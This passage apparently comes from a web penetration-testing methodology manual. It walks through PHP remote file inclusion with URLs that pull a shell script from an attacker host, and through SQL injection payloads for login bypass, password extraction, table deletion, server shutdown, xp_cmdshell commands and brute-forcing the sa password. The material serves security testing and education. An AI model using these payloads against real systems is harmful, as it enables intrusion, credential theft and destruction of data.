Remarks
Page 750 of 1123
P.11.2
Hidden Form Fields Manipulation
Description
Web applications are stateless in nature. In an attempt to preserve state, the most easiest
and common method is to use hidden fields to store information. However, they are not
exactly hidden; they are just not being displayed to the user. A lot of applications out there
use these fields to store merchandise prices, usernames or passwords.
Some specific uses of Hidden Fields:
ƒ
insert the date and time the form was sent
ƒ
insert the URL where the form was filled out
ƒ
insert the referring documents URL
ƒ
Redirect the user to a thank you page after the form has been submitted.
ƒ
thank the user with an alert
ƒ
Sending Session-Id for the Session Management.
ƒ
Keeping the values of the previous page which need to pass to the application but
didn’t show on the current page.
A malicious user, by using a browser can easily save the HTML source page, change the
value and then re-submits the form. The web server does not validate the source, even if it
is changed, thus happily accepts and proceeds with the transaction using the newly
changed values.
Or User can use Achilles for modifying request as I mentioned in above section
Pre-requisite[s]
Examples/Results
Page 751 of 1123
Analysis/Conclusion/Observation
Countermeasures
•
Never trust hidden Input values
•
Proved that it is easy to change values
•
Never allow unsanitized (without checking) inputs to be processed at the SERVER
directly.In this case just validate the price with the price stored in database or some
files etc...
Tool[s]
•
Further Reading[s]
Remarks
Page 752 of 1123
P.11.3
Cookie Manipulation
Description
Cookies are the piece of information which server sends to client for different purposes.
The main aim of cookie is to identify the client. There can be two types of cookies.
1) Persistent Cookie
Persistent cookies are pieces of information generated by a Web server and stored
at the client computer permanently i.e. in the user's computer, which are ready for
future access. Cookies are embedded in the HTML, information flowing back and
forth between the user's computer and the servers. Server uses these cookies even
once computer is disconnected from the internet or restarted. Normally server uses
this type of cookies for keeping user information. i.e. www.amazon.com these
cookies are simple written in a text file. So it’s quite easy to play with it. Different
browsers have some fixed location to store these cookies on the client computer so
it won’t take much effort of malicious user to search for such cookies. A malicious
user can search the cookies stored on the Client’s PC and by changing the values
of the cookies can get unauthorized access to the others accounts.
An attacker can manipulate the cookies in following ways:
ƒ
Explicitly, with a CGI program.
ƒ
Programmatically, with client-side JavaScript using the cookie property of the
document object.
ƒ
Transparently, with the LiveWire the client objects, when using client-cookie
maintenance.
2) Session Cookie
Session cookies are the cookies which normally server keeps for authentication
purpose. In a way session cookie are secure than persistent cookies as they will be
deleted from the server as soon as session expires. Server has to keep entries on
server when cookie expires. Many times it is found that server allows to change the
session cookie even after session is expired.
Basic Elements Of cookie
•
Cookies have 7 key attributes: Domain, flag, path, secure, expiration, Name, Value.
Page 753 of 1123
•
A Cookie can not exceed more than 4 Kb
•
Cookies are of two types
–
Persistence Cookies: Which resides on the client’s Hard Drive for a specific
period of time
–
Non-Persistence Cookies: These are the session specific cookies, and
deleted as soon as the session overs.
Use Of Cookie
•
Store and manipulate any information you explicitly provide to a site
•
Manages the session between various pages
•
Track your interaction with parent site such as page visited, times visited, time when
visited
•
A client can use any information available to Web Server including IP Address,
Operating System, Browser type etc
A typical cookie algorithm
Cookie Manipulation
•
If Cookies are not Securely encoded, allowing a hacker to modify them
Page 754 of 1123
•
Example:
“Poisoning” the cookie (Userid and timestamp)
•
Risks: Bypassing the authentication, gain access to accounts and information of
other users.
Pre-requisite[s]
Examples/Results
Page 755 of 1123
Page 756 of 1123
Page 757 of 1123
Page 758 of 1123
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Further Reading[s]
Remarks
Page 759 of 1123
P.12VULNERABILITY IDENTIFICATION
P.12.1
Check vulnerabilities associated with web server version
Description
Most of the web server has different vulns and more and more vulns are coming as the
days are passing. It is necessary to check all this vulns after determining target web server.
Some known vulns are? DefaultNav on domino, Unicode, Double Decode on IIS.
One
can
find
more
information
on
different
vulns
at
www.securityfocus.com
www.securityportals.com,
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Further Reading[s]
Remarks
Page 760 of 1123
P.12.2
Run Automated Web Vulnerability Scanner
Description
There are many tools which checks vuln checking for web servers. Name of such tools are
Whisker, WebScan, NtoSpider GFI Lan Guard, Nessus
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
WebScan, NtoSpider, Nessus, GFiLanGuard
Further Reading[s]
Remarks
Page 761 of 1123
P.12.3
Check vulnerabilities associated with modules running on
web server
Description
Many times it is found that the web server di\oes not have any vuln. Or web server is
patched but the modules running on it has some vulns. One can exploit this vulns and led
the web server to sacrifice. A recent vulns of openssl is one of them.
One
can
find
more
information
on
different
vulns
at
www.securityfocus.com
www.securityportals.com
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
Further Reading[s]
Remarks
Page 762 of 1123
P.13INPUT VALIDATION
It is important to check the input validation for any application. If application validates all
its input than chances are very rare that application exposes some unnecessary
information. The simple rule behind this is “Accept only data which you are expecting
and if you do not understand anything deny the same.” One has to check input validation
in following manner.
1) Validate Data
2) Buffer Overflow
P.13.1
Validate data
Description
Web application has to validate each and every input it is accepting from the user. Such as
Price and quantity fields cannot accept negative value. So for all the fields application
should first check for data type it is expecting from the client and the value it is expecting
from the client.
Many Times, Web developer validates posted information on client side before
posting it to the server. Specially, in the case of java script and vb script web pages. User
can very easily bypass this validation by modifying request after browser has validated and
before it reaches to server. A tool named ACHILES can be used for this purpose.
Pre-requisite[s]
Examples/Results
Page 763 of 1123
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
ACHILES, PAROS
Further Reading[s]
Remarks
Page 764 of 1123
P.13.2
Test Buffer overflow
Description
In a simple language, Buffer overflow means giving more sized buffer than what application
is expecting. If size of the field is validated on client side, it can be utilized for buffer
overflow attack. User can bypass this validation on client side by modifying request after
browser has validated and before it reaches to server. A tool named ACHILES can be used
for this purpose.
Pre-requisite[s]
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Tool[s]
•
ACHILES, PAROS
Further Reading[s]
Remarks
Page 765 of 1123
P.13.3
PHF Insertion
PHP is a widely used language in web applications. It has lots of features found in high
level programming languages today, as, for example: transparent memory management,
similar syntax to the C language, simplicity for common tasks (file management and
string parsing) and a full-featured API with functions that let coders access most popular
database servers very easily.
PHP configuration is specified in php.ini, which resides in /windows or /winnt (in
Windows enviroments) or in /etc/ in the Unix world. If the webserver that executes scripts
is Apache Win32, it is necessary to have a copy of php.ini in the install directory.
There are two options in the config file that, when activated, let the attack be
implemented:
-
allow_url_fopen = On : if this option is on, it is posible to open files located in
remote servers (using http or ftp protocols) through fopen ()
-
register_globals = On : if this option is on, it is possible to get values for variables
used in PHP code from parameters in an HTML form (you can set PHP variables
using HTML)
As long as these two options are on, and one script in the application presents the
structure we will see next, it is possible to inject arbitrary PHP code in web server files. In
this situation, it is possible to run arbitrary commands remotely with privileges of the UID
running the script.
-
Zeroboard: gestor de tablones basado en web, con la funcionalidad habitual de
un foro en Internet
-
PhpBB
Page 766 of 1123
Products listed below were vulnerable to this type of attack:
-
osCommerce: e-commerce solution that lets you create a web-based online store
-
Zeroboard: web-based board manager
-
PhpBB: web-based BBS manager
Now it’s time to analyze vulnerable scripts in these products.
In osCommerce, the name of the vulnerable script is include_once.php:
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
This script is used frequently in different parts of the application. Developers have tried
to encapsulate code-insertion funcionality into include_once.php, so that, when you need
to insert one fragment of code, this script is inserted first and it will take care of inserting
the one you specify (it also defines a symbol to avoid inserting the same code more than
once).
As an example, this is part of product_reviews.php:
<body
marginwidth="0"
marginheight="0"
topmargin="0"
bottommargin="0"
leftmargin="0" rightmargin="0" bgcolor="#FFFFFF">
<!-- header //-->
<? $include_file = DIR_WS_INCLUDES . 'header.php'; include(DIR_WS_INCLUDES
. 'include_once.php'); ?>
<!-- header_eof //-->
Here we can confirm the code-insertion strategy explained above.
Page 767 of 1123
Once the script is analyzed, explotation is trivial. You just have to bring up a webserver
in the machine where you plan to implement the attack and include one PHP file with
code you would like to execute. For example:
<? passthru ("<comando>") ?>
With passthru we get a PHP-based shell in the vulnerable webserver: we can execute
any command and see the output:
http://servidor_vulnerable/catalog/inludes/include_once.php?include_file=http://atacante/
shell.php
Same error, altought with a slightly different structure, is found in phpBB 2.0.1.
install.php script completes installation process, makes some checks and creates a
database which will be used as a content backend. Besides, administrator can make
configuration changes, after authentication. Here is a fragment of the vulnerable code:
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
Again, if register_globals and allow_url_fopen are on, it is posible to insert PHP code
coming from another webserver, with just one added limitation: in this case, the name of
the included script should be functions_selects.php, and this file should belong to
includes directory:
http://servidor_vulnerable/install.php?phpbb_root_dir=http://atacante/
Last example is ZeroBoard. Vulnerable script is _head.php, which makes a codeinsertion very similar to the one found in the previous example, but the name of the script
now should be alib.php:
http://servidor_vulnerable/_head.php?_zb_path=http://atacante/
Now we are going to build an own escenario in which we can test the vulnerability.
Vulnerable script is include_once.php, same as in osCommerce:
Page 768 of 1123
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
This is the main page, to which we want to deface:
<Diagram>
Code we want to execute in the vulnerable server is this:
<? passthru ("echo defaced_web! > indice.html"); ?>
Now we just have to access an URL like this one:
http://10.0.1.1/include_once.php?include_file=http://10.0.1.2/ataque.php
We have got to change the content of the main webpage:
<Diagram>
Page 769 of 1123
P.14TEST SQL INJECTION
Description
SQL Injection is a technique through which an attacker can create or alter existing SQL
commands (by using some special symbol) to gain access to important data or even the
ability to execute system level commands in the server. SQL injections are the result of
Poor Input Validation and can be blocked by proper input validation.
Purpose
SQL Injections occurs when an attacker is able to insert a series of SQL statements into
a ‘query’ by manipulating data input into an application.
Application
that
do
not
correctly validate and/or sanitize the user input, can potentially be exploited in several
ways
•
Changing SQL values.
•
Concatenating SQL Values.
•
Adding Function calls & stored Procedures to a statement.
•
Typecast and concatenate retrieved data.
•
Adding system functions & procedure to find out critical information about the server.
Test Environment
Test environment developed by us is very simple, which uses Microsoft SQL server 2000
as a Database Management System, Web Server and a authentication web site. The
test environment also contains two asp pages one is for gathering user input & another
one is for checking user input against the data in the database using SQL Query.
Architecture
Test Environment is based on the two-tire Architecture. Diagram of typical two-tire
architecture is shown below:
<Diagram>
In two-tier architecture a client talks directly to a server, with no intervening server. It is
typically used in small environments (less than 50 users).
Some important characteristics of a two-tier application are:
Page 770 of 1123
•
User Interface on clients (desktops).
•
Database on servers (more powerful machines).
•
Business logic residing mostly on clients.
•
Stored procedures for data access on the servers.
•
SQLs used for communication.
Database Management System:
[Microsoft SQL Server 2000].
Database Name
: Injection.
Table Name
: Authentication.
Table Structure
: Slno
Integer (4)
Name
Character (20)
Password
Character (20)
Front-end Structure:
Authentication Page: [Login.asp]
This page is designed to take user input. There are two text boxes in the page with one
submit button. When user click on the submit button the values of the text boxes are
submitted to verify.asp page at the Server site.
Objective
ƒ
Bypassing Authentication
ƒ
Retrieving the Database Structure
ƒ
Understanding Execution of the DML Statements
P.14.1
Methodology
•
Check SQL Injection Vulnerability
•
Bypass user authentication
•
Get Control on Database
•
Get Control on Host
•
Map Internal LAN and Get data from other hosts
•
Attack on Other Operating Systems
Page 771 of 1123
P.15TEST SERVER SIDE INCLUDE
[Text]
Page 772 of 1123
P.16GLOBAL COUNTERMEASURES
•
Logout of all sessions when done
•
Do not select the “Remember me” Option
•
Protect your cookie’s Desktop Security
•
Ensure you use SSL – when given choice of standard / secure login
•
Patch your browser to be safe from some nasty Cross-site Scripting attacks
•
Treat
emails
with
Session
ID
info
in
URL’s
just
as
securely
as
username/passwords
•
Patch your web server regularly
•
Make sure that your web server expose as less details as it can
•
Keep an eye on logs on the server, if you find any malicious request continuously
from specific IP, block the IP
P.17FURTHER READING[S]
Web Hacking – Attacks and Defense By Saumil Shah and Shreeraj Shah
Hacking Exposed – Web Edition By Stuart Maclure
Page 773 of 1123
Q WEB APPLICATION SECURITY (CONTINUE…) – SQL
INJECTIONS
Q.1 DESCRIPTION
SQL Injection is a technique through which an attacker can create or alter existing SQL
commands (by using some special symbol) to gain access to important data or even the
ability to execute system level commands in the server. Additionally after getting control
on server other SQL Servers can also be mapped. SQL injections are the result of Poor
Input Validation and can be blocked by proper input validation.
Q.2 PURPOSE
SQL Injections occurs when an attacker is able to insert a series of SQL statements into
a ‘query’ by manipulating data input into an application. Application that do not correctly
validate and/or sanitize the user input can potentially be exploited in several ways.
•
Changing SQL values.
•
Concatenating SQL Values.
•
Adding Function calls & stored Procedures to a statement.
•
Typecast and concatenate retrieved data.
•
Adding system functions & procedure to find out critical information about the server.
Q.3 TEST ENVIRONMENT
Test environment developed by us is very simple, which uses Microsoft SQL server 2000
as a Database Management System, Web Server and an authentication web site. The
test environment also contains two asp pages one is for gathering user input & another
one is for checking user input against the data in the database using SQL Query.
Architecture
Test Environment is based on the two-tire Architecture. Diagram of typical two-tire
architecture is shown below:
<Diagram>
Page 774 of 1123
In two-tier architecture a client talks directly to a server, with no intervening server. It is
typically used in small environments (less than 50 users). Some important characteristics
of a two-tier application are:
•
User Interface on clients (desktops).
•
Database on servers (more powerful machines).
•
Business logic residing mostly on clients.
•
Stored procedures for data access on the servers.
•
SQLs used for communication.
Database Management System:
[Microsoft SQL Server 2000].
Database Name
: Injection.
Table Name
: Authentication.
Table Structure
: Slno
Integer (4)
Name
Character (20)
Password
Character (20)
Front-end Structure:
Authentication Page: [Login.asp]
This page is designed to take user input. There are two text boxes in the page with one
submit button. When user click on the submit button the values of the text boxes are
submitted to verify.asp page at the Server site.
Q.4 TERMINOLOGY
[Text]
Q.5 OBJECTIVE
•
Bypassing Authentication
•
Retrieving the Database Structure
•
Understanding Execution of the DML Statements
•
Execute system operating command
•
Map Internal Network
Page 775 of 1123
Q.6 EXPECTED RESULT
[Text]
Q.7 METHODOLOGY / PROCESS
Q.7.1.1 CHECK SQL INJECTION VULNERABILITY
To find whether a site is vulnerable to SQL injections, try followings special characters in
input:
‘
;
,
‘‘
%
-
*
Q.7.1.2 BYPASS USER AUTHENTICATION
1. ' Or 1=1); -2. 'OR''='
3. ' any_bad_value
4. ‘ “
5. ‘ “or”
6. ‘admin’—
7. “any_bad_value” ‘ etc
Q.7.1.3 GET CONTROL OVER DATABASE
1. Getting Name of the Table (Using Having Clause)
2. Getting all Columns of the Table (Using Group by Clause)
3. Determining the Number of Columns: (Using Union Clause)
4. Finding Data types (using aggregate functions)
5. Getting Username & Password from table
6. Inserting Values in the Table
7. Updating Values of the Table
8. Deleting Entire Data from the Table (using Delete or Drop statement)
9. Displaying desired Information from the table in the Browser
Q.7.1.4 GET CONTROL ON HOST
1. Getting server name
2. Executing Commands on the Serer
3. Shutting Down the SQL Server
Page 776 of 1123
4. Brute Force to Find Password of SQL Server
5. Retrieving data from SQL Injections
6. Xp_regread and Xp_regwrite extended procedure
7. Xp_servicecontrol Extended Procedure
Q.7.1.5 MAP INTERNAL NETWORK
Q.7.1.6 RUN AUTOMATED SCANNER
In case you haven’t found the SQL Injection vulnerability you can run the the automated
scanner. This can also be done after performing all tests mentioned above to cover other
holes which may remain while manual assessment.
Q.8 CHECK SQL INJECTION VULNERABILITY
The first step before performing the SQL Injections is, to test whether a site is vulnerable
to SQL Injections or not. It can be achieved by giving some specially crafted input. If
input results in an error message or abnormal webpage, it means site is vulnerable to
SQL Injections. To find whether a site is vulnerable to SQL injections, try followings
special characters in input:
‘
;
,
‘‘
%
-
*
Note:
It is frequent to see web applications, in such a way that in the face of any error: it shows
a generic message, redirects the user to the home page or just refreshes the last page
visited. This usually has the effect that, although the SQL injection is happening, the
result of it is not shown to assessor. Some of the techniques specified, have been
developed to affront this situation commonly known as “Blind SQL Injection”, anyway,
there will always exist the possibility of using some proxy type application, to intercept
HTTP traffic in search of intermediate answers, so that one can check SQL Injection
vulnerability.
Page 777 of 1123
Q.9 BYPASSING USER AUTHENTICATION
Description
This step could be used to bypass the authentication without providing the valid
username and password.
Objective
To bypass the authentication without providing the valid username and password
Expected Result
An attacker can get the unauthorized access of website without providing credentials.
Step-by-step explanation
An attacker can easily bypass Login Page without providing a valid user name &
password. He just needs to give:
' or 1=1-- (In the User Name text Box)
On submitting this page SQL query (at the server) becomes:
select * from authentication where name = ' ' or 1=1--
Note:
MS SQL Server treats anything after -- as comment so rest of the query will be ignored.
Even if a site is vulnerable to SQL Injections, most of the time it will not work since it
entirely depends upon the way that ASP Code is written. Try all the following possible
combinations:
1. 'or 1=1; -2. ' or 1=1); -3. 'OR''='
4. ' any_bad_value
5. ‘ “
6. ‘ “or”
7. ‘admin’-8. “ any_bad_value” ‘ etc.
Page 778 of 1123
Note:
These injections might not always produce positive effect. The effect of SQL injections
is depend on how well the web application programs.
Secure against illegal authentication?
To restrict illegal authentication, one may use stored procedures (passing username as
its parameter), instead of writing complete SQL query in the querystring. That is
something like .
Set Recordsource = connectionstering.execute (exec logincheck
"' &requset.querystring ("username") &"'").
Now while trying to bypass this code by supplying ' or 1=1’ as username it won’t work.
The reason is SQL queries that execute a stored procedure can’t be conditional and the
presence of 'OR' makes it so. Thus produce an error:
Microsoft OLE DB Provider for ODBC drivers error '80040e14'
[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.
/verify1.asp, line 5.
Q.10 GET CONTROL OVER DATABASE
Description
Using the SQL Injection an attacker can insert or update the values in the table, before
that an attacker has to get the information of table, such as table name, column name
and other information.
Expected Result
To get the table name, column name and type which will be used for an attacker
inserting, reading and modifying table records.
Step-by-step explanation
Page 779 of 1123
Q.10.1
Getting Name of the Table (Using having Clause)
So as to obtain the name of the table used in the query, or also at least one of its fields,
an attacker will be able to build an entry ‘having 1=1-- , in the username/password form.
select * from authentication where name = '’having 1=1--' and password = '’having
1=1--'
When ODBC tries to parse this query the next error message is generated:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'authentication.slno' is invalid
in the select list because it is not contained in either an aggregate function and there is
no GROUP BY clause.
/verify.asp, line 24
From this interesting message, an attacker can get the name of table (authentication)
and a column name (slno) which will be extremely useful for later enumeration.
Q.10.2
Getting all Columns of the Table: (Using Group by Clause)
With the information mentioned above and using the statement “having” with the
statement “group by”, an attacker will be able to list the rest of column of the targeted
table.
‘group by authentication.slno having 1=1—
As it was supposed, the SQL statement in the server side will look like this:
select * from authentication where name = 'group by authentication.slno having
1=1-Once the query is processed, ODBC will give us an error message for new enumerated
field!
Page 780 of 1123
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'authentication.password' is
invalid in the select list because it is not contained in either an aggregate function or the
GROUP BY clause.
/verify.asp, line 24
The error is generated by ODBC driver because group by should contain all the columns
occurring in select list. By keep-applying group-by clause recursively with newly found
column, an attacker can get all names of columns of the table.
Q.10.3
Determining the Number of Columns: (Using Union
Clause)
To check that whether Attacker has got all the columns or not, he has just need to use
union clause: An attacker can proceed by giving following input into text box:
Xyz’ union select slno,name from authentication; -On submitting this value the query at the server site becomes something like:
select * from authentication where name = 'Xyz' union select slno, name from
authentication—
When ODBC try to parse this query it will generate following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target
lists.
/verify1.asp, line 24
What does this error means?
Server is telling that slno & name are not the only columns in the table, as the
UNION clause is not matching the number of columns in the table. This means that
Page 781 of 1123
attacker has to use group by clause again to find the hidden columns. When he
includes all the columns in the query, ODBC will not generate any error message &
this would be the indication that attacker has got all the columns of the table.
Q.10.4
Finding Data types: (using aggregate functions)
At this stage attacker got the table name & all the columns of the table. But if he wants to
insert some value(s) into the table or update some columns value, he would need to
know about the data type of the columns. To find out data type of the column just he has
to enter:
Xyz’union select sum(field_name)—(In the username text box)
When this value will be submitted to the server, query at the server becomes:
select * from authentication where name = ’xyz’union select sum(field
sum (field_name)-Here (field_name) is a column name of currently used table. When ODBC try to parse
this query, it will generate following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate
operation cannot take a char data type as an argument.
/verify.asp, line 24
The above error message is giving information that the name field of the table is of
VARCHAR type. In case that the table field would have been of the NUMERIC type, the
ODBC eror, would have looked this way:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target
lists.
Page 782 of 1123
/verify.asp, line 24
By proceeding in the same manner & applying aggregate functions on the rest of the
columns we can get data types for all the columns.
Note:
Another way to get the type information is us the system tables SYSOBJECTS and
SYSCOLUMNS (only for MS-SQL Server) to enumerate data type in a neat way. Lets
see how the statements to inject should look like:
Ups' union select b.name,1,1 from sysobjects a, syscolumns b where a.id=b.id and
a.name='table_name' and b.colorder = 48 -And its result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value
'field_name' to a column of data type int.
/Login.asp, line 85
Why we need all columns and Data Types?
Since some columns does not support null values, we have to specify some value for
those columns otherwise it won’t be possible to insert values into table. In order to
achive this, we need all column names and data type.
Q.10.5
Getting Username & Password from table:
Aggregate functions can be used to determine some values in any table in the database.
Since attackers are interested in usernames & passwords, they likely to read the
usernames from the user table, like this:
‘ union select min(name), 1,1 from authentication where username > ‘a’-- (In the
username text box)
Page 783 of 1123
When this value is submitted to the server, it will become:
select * from authentication where name =’’ union select min (name), 1,1 from
authentication where username > ‘a’; -When the above query is executed, its first statement (before “union” clause) returns
null value and Second returns minimum username that is greater than ‘a’, while
attempting to convert it to an integer, produces error:
Microsoft OLE DB provider for ODBC driver error ‘80040e07’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar
value ‘Xyz’ to a column of data type int.
/verify.asp, line 25
So the attacker now knows that the username ‘Xyz’ exists in the table. He can now
iterate through the rows in the table by substituting each new username, he discovered
into where clause:
‘union select min(name), 1,1 from authentication where username > ‘Xyz’-- (In the
username text box)
Again when ODBC tries to convert character value in the integer, it generates an error:
Microsoft OLE DB provider for ODBC driver error ‘80040e07’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar
value ‘Mylogin’ to a column of data type int.
/verify.asp, line 25
From this error attacker has got one more username that exist in the table. By using the
same trick, he can obtain all the username from the table. Once the attacker get the
usernames, he can gather passwords:
‘union select password, 1,1 from authentication where name =’Xyz’-- (In the
username text box)
Page 784 of 1123
Again ODBC tries to convert character value (password) to an integer & generates
the following error message:
Microsoft OLE DB provider for ODBC driver error ‘80040e07’
[Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting the
character value ‘Abc’ to a column of a data type Int.
From the above error attacker comes to know that “Abc” is the password for user
“Xyz”.
A More elegant way to display all username & password is to concatenate
usernames & passwords into a single string & then attempt to convert into an integer.
This technique is documented forward in this same section, under the title:
“Displaying desired Information from the table in the Browser”
Q.10.6
Inserting Values in the Table:
As attacker has already got all the necessary information (table name, column name,
data type of columns) , He can easily insert data into the table using insert
statement. The attacker just needs to enter:
’ insert into authentication (name, password) values ('xyz','xyz')-When this value is submitted to the server, the query becomes:
select * from authentication where name = ’ ’insert into authentication (name,
password) values (‘xyz’,'xyz')-Here the select query doesn’t make any sense so it is ignored & insert query will execute
successfully.
Q.10.7
Updating Values of the Table:
In order to update the values of the table, attacker can follow the same procedure as
insert. To update values of columns, say password of a user, attacker just has to inject
Page 785 of 1123
the next statement in the user name text box:
’ update authentication set password = 'Xyz' where name =‘mylogin’--
(In the
username text box)
When this values is submitted, the query at the server becomes:
select * from authentication where name =’’update authentication set password =
‘mylogin’ where username = ’Xyz’-So what the attacker has done, he has successfully changed the password of user “Xyz”,
without knowing his Old Password.
Q.10.8
Deleting Entire Data from the Table: (using Delete or Drop
statement)
Any attacker can make our life much more difficult by dropping the data of entire table
with Delete or Drop statement. He just has to enter a simple statement in the username
textbox:
'; drop table authentication--
or
Xyz’ delete from authentication--
When this statement is submitted to the server, query becomes:
select * from authentication where name = ‘‘;drop table authentication-or
select * from authentication where name = ‘Xyz’ delete from authentication-This query results in loss of all the data stored in the authentication table.
Page 786 of 1123
Q.10.9
Displaying desired Information from the table in the
Browser
It is already mentioned earlier that how to get username and password. It is discussed
here in more detail to get all fields of the table. An attacker can use of stored
procedure/PL-SQL/Transact SQL Block, to display entire data of Column(s) in the
browser itself. There are three steps procedure:
1º STEP - Generation of Auxiliary Table
The initial idea behind the first step, is to use the SQL functionality to generate tables on
the fly with the clause INTO, saving itself to one record (what will be more effective for
post visualization) that can be exported later.
In this way, the attacker will have to create a temp table (Over the server), which will
contain data extracted from the main table (Over the server). The temporary table
contains only one column & that column will contain the values from different columns of
the main table as a string.
Let´s see how an SQL string injected in Transact SQL (Microsoft SQL Server) to get this
effect
'declare @col varchar(8000) set @col='' select
@col=@col+name+'/'+password+';'from authentication where slno>@col select
@col as col into temp_table—
This script, which is written in Transact SQL, converts all usernames & passwords into a
single string & store into a temporary table. In the same way, in Oracle could be built a
PL/SQL Block for the same purpose:
Xyz’ begin declare @col varchar (2000)
Set @col=':'
Select @col = @col +name+’/’+password from authentication;
Select @col as col into temp_table;
End; --
Page 787 of 1123
Note:
temp_table is the temporary table name. Col is the name of column of temporary table
temp_table. @Col is variable for the PL/SQL script.
2º Step - Browsing the auxiliary table
In the second step, the attacker want to display data from the temporary table that he
has created in the previous step. To do this, the attacker has to build and inject a
SELECT to consult the temporary table temporally, for what he will use the technique of
joining previously commented at the beginning of this section:
Zxy'union select col,1,1 from temp_table-After submitting the above text in the username text box, SQL query at the server site
will become:
select * from authentication where name = '' Union select col,1,1 from
temp_table-The first column in the authentication is numeric & the column in the temp_table is
character type, when ODBC tries to match the two columns, it generates an error and
will display all the data in the Browser from the temp_table.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar
value 'Xyz/abc;MyLogin/xyz;Abc/xyz to a column of a data type Integer.
3º Step - Deletion of auxiliary table
Once obtained the searched data, the attacker will delete the temporary table by
injecting the DROP command, as shown in the following example:
';drop table temp_table—
Q.11 GET CONTROL ON HOST
Page 788 of 1123
Description
Once the attacker has got control to the database, they are likely to use that access to
gain further control.
Expected Results
An attacker can achieve this by using following:
•
Using @@variables of SQL Server.
•
By using xp_cmdshell extended procedure to run commands on the server.
•
By using xp_regread extended procedure to read the registry keys of the server.
•
By using xp_regwrite extended procedure to edit the registry of the server.
•
By using xp_servicecontrol
•
Use other extended procedures to influence the server functions.
•
Use bulk insert statement to read a file on the server.
Step-by-step explanation
Q.11.1
Getting Server Name
We can even determine server name by using SQL-SERVER built-in functions in to SQL
Queries.
Eg: ' union select @@servername,1,1-Select @@servername will return the server name & when it is compared with the first
column of authentication table (which is a numeric column) ODBC will generate an error
& server name will be printed in the Browser.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec
17
2002
14:22:05
Copyright 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build
2195: Service Pack 3)
' to a column of data type int.
Page 789 of 1123
Q.11.2
Executing Commands on the Serer
An attacker can use SQL-SERVER built-in procedure (xp_cmdshell) to run operating
system commands at the server. Here are some examples that how can an attacker
exploit your system:
Sentencia
Propósito
' Xp_cmdshell 'dir'
To get the listing of existing
directories/files
on
the
server
‘ Xp_cmdshell ‘net user’
To get listing of all users on
the machine
‘Xp_cmdshell ‘del boot.ini’
Delete any system file
‘Xp_cmdshell ‘net share nombre=drive:path’
Sharing resource
‘Xp_cmdshell ‘net user username password’
Add user
Q.11.3
Shutting Down the SQL Server:
An attacker can even shutdown the SQL server if the privileges are not managed
properly. An attacker can shut down the server by giving following statement in the
username text box:
‘;SHUTDOWN-When this value is submitted at the server site, the SQL Query becomes:
select * from authentication where name = ‘‘; SHUTDOWN—
As ‘;’ is the command separator in SQL server, after executing the select statement it
executes SHUTDOWN statement which stops the SQL server & any further request sent
to the server will fail.
Q.11.4
Brute Force to Find Password of SQL Server:
If attacker has access to an account that can issue the ‘OPENROWSET’ command, they
Page 790 of 1123
can attempt to re-authenticate with SQL Server, effectively allowing them to guess
passwords. There are several variants of ‘OPENROWSET’ syntax. The most useful
syntax of OPENROWSET is:
Using MSDASQL:
select * from OPENROWSET (‘MSDASQL’,’DRIVER = {SQL SERVER}; SERVER =;
uid = Sa; pwd = Sa ’,’’ select * from version’)
Using SQLOLEDB:
select * from OPENROWSET (‘SQLOLEDB’, ’ ‘; ‘Sa’; ‘Sa’,’ select @@version’)
By default everyone can execute ‘XP_execresultset’, which leads to the following
elaboration on the previous two methods:
Using MSDASQL:
exec XP_execresultset N‘ select * from OPENROWSET (‘ ‘ MSDASQL‘ ’ ’, ‘ ’
DRIVER ={SQL Server}; SERVER =; uid = Sa; pwd =foo ‘‘, ‘’ select @@version) ‘,
N’master
Using SQLOLEDB:
exec XP_execresultset N’ select * from OPENROWSET (‘’ SQLOLEDB ‘’, ‘’ ‘’; ‘’ sa
‘’; ‘’ foo ‘’; ’’ select @@version ‘’)’ N’master
By default, in the SQL Server 2000, a low–privileged account cannot execute the
MSDASQL variant of the above syntax, but they can execute the SQLLOLEDB syntax.
OPENROWSET authentication is instant, and provides no timeout in case of an
unsuccessful authentication attempt, it is possible to inject a script that will brute force
the ‘sa’ password by using the processing capabilities of the server itself.
Page 791 of 1123
Q.11.5
Retrieving data from SQL Injections:
The functions OPENROWSET & OPENDATASOURCE can be used to pull data to &
from the remote database to a local database. OPENROWSET can be used with select,
Insert, Update & delete statement on the external data source.
Note:
Performing data manipulation on the remote data source is not very common & it is not
possible always because it is the dependent on the OLEDB provider. SQLOLEDB
supports this feature.
